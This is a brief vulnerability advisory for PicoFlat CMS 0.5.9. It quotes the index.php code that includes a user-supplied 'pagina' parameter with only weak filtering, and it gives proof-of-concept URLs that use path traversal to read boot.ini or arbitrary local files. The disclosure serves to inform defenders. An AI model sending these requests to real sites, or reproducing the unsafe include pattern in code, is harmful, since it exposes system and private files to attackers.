PicoFlat CMS version 0.5.9 suffers from a local file inclusion vulnerability in index.php. This uses the same variable that had a remote file inclusion vulnerability back in October of 2007.
2c10e7ccf5e8093e189b8ea95b4a6be0c6d6ebaf61737cd4024a8481c1a945ff
---------------------------------------------------------------------------
type attacak:Local File inclusion and that the possibility of a
Directory traversal Windows disclosure boot.ini
site name picoflatcms 0.5.9
download http://picoflat.altervista.org/index.php?
by gmda
<!-- gmda@email.it -->
---------------------------------------------------------------------------
bug code
<?php if (eregi('://', $pagina) || eregi('\?', $pagina)) {
$pagina = "";
include "notfound.php";
}else{
include $pagina; }
?>
p.o.c
http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini
http://127.0.0.1/path/index.php?pagina=[file]